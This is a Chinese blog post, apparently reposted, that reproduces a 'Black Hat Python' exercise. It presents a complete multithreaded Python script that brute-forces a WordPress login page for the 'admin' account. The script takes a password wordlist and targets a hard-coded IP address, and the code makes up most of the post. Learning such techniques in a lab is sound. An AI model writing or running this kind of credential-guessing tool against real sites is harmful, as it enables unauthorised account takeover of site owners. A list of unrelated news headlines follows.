2. 科技
  3. python渗透测试入门之wordpress登录

python渗透测试入门之wordpress登录

信息安全不简单鸭2024-05-01 19:26:20  94

近期收到了电子工业出版社赠送的一本网络安全书籍《python黑帽子》,书中一共24个实验,今天复现第14个实验(密码猜测),我的测试环境是mbp电脑+同事的wordpress站点+conda开发环境。有一说一,弱口令是脆弱的,但是复杂密码根本猜不出来,需要分析站点POST请求和响应是值得肯定的,但是等着耗着CPU和网络是不可取的~

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

1、查阅wordpress站点登录页面源代码

首先GET请求,接受返回的所有cookie

解析返回页面中的表单元素(观察input标签,log是用户名、pwd是密码、wp-submit是提交、testcookie是隐藏cookie)

修改返回页面中的表单元素(将用户名设置为“admin”,将密码设置为字典中的每个元素,其他不变)

提交POST请求

2、下载字典文件

3、在mbp上运行脚本

参考代码:

# -*- coding: utf-8 -*-# @Time : 2022/6/13 9:47 PM# @Author : ailx10# @File : wordpress_killer.pyfrom io import BytesIOfrom lxml import etreefrom queue import Queueimport requestsimport sysimport threadingimport time# SUCCESS = "Welcome to WordPress!"SUCCESS = "欢迎"TARGET = "http://124.223.4.212/wp-login.php"WORDLIST = "/Users/ailx10/py3hack/chapter5/cain.txt"def get_words: with open(WORDLIST) as f: raw_words = f.read words = Queue for word in raw_words.split: words.put(word) return wordsdef get_params(content): params = dict parser = etree.HTMLParser tree = etree.parse(BytesIO(content),parser=parser) for elem in tree.findall("//input"): name = elem.get("name") if name is not None: params[name] = elem.get("value",None) return paramsclass Bruter: def __init__(self,username,url): self.username = username self.url = url self.found = False print(f" Brute Force Attack beginning on {url}. ") print("Finished the setup where username = %s "%username) def run_bruteforce(self,passwords): for _ in range(10): t = threading.Thread(target=self.web_bruter,args=(passwords,)) t.start def web_bruter(self,passwords): session = requests.Session resp0 = session.get(self.url) params = get_params(resp0.content) params["log"] = self.username while not passwords.empty and not self.found: time.sleep(1) passwd = passwords.get print(f"Trying username/password {self.username}/{passwd:<10}") params["pwd"] = passwd resp1 = session.post(self.url,data=params) if SUCCESS in resp1.content.decode: self.found = True print(f" Bruteforcing successful.") print("Username is %s"%self.username) print("Password is %s "%passwd) print("done.")if __name__ == "__main__": words = get_words b = Bruter("admin",TARGET) b.run_bruteforce(words)

发布于 2022-06-13 22:23

转载此文是出于传递更多信息目的。若来源标注错误或侵犯了您的合法权益,请与本站联系,我们将及时更正、删除、谢谢。
https://www.414w.com/read/389017.html
0
随机主题
汪峰女友森林北旧照,牙齿参差不齐黑眼圈严重,与普通人没差别邻国总理底气十足, 美国算什么, 与中国的合作, 才是头等大事iPhone带手机壳散热不好?不可能,绝对不可能!金属手机壳专业收割宝妈,张庭卷土重来王力宏补位歌手2024火箭的控球简直是登峰造极,乱局长台精准入手,面对高难度局面彻底是杀疯了东方财富网股吧社区将开展内容专项治理迪马尔科致谢: 永远不会忘记你所做的一切, 张康阳回复: 爱你5月23日老凤祥黄金价格740元/克浦江县交通运输综合行政执法队赴浦新矿业公司开展运输专项检查“政银担企”助推广州大规模设备更新改造, 重点支持五个领域配角锦上添花! 《庆余年2》口碑回暖! 6位不知名的配角, 你认识几个从“互掐”到“握”手 警律联动化解矛盾纠纷女子为了帮衬娘家, 婚内转移财产300万, 丈夫得知后诉讼离婚同样面对权臣, 孙亮谨小慎微, 曹髦英勇无畏, 谁更值得称道?美国黑鲈“入侵”珠江, 成为新的霸主? 就连清道夫它们也能生吞!解读京东内部大调整, 严抓出勤, 取消微信非工作群等京东推京八条严抓考勤鼓励举报摸鱼, 打工人哭了数据: 4个希腊人当中就有1个老人有人认为职业年金是私分国有资产的由头, 你认为这种说法靠谱吗?丰田新款“大号凯美瑞”亮相, 氢燃料电池车, 海外售价不菲!
最新回复(0)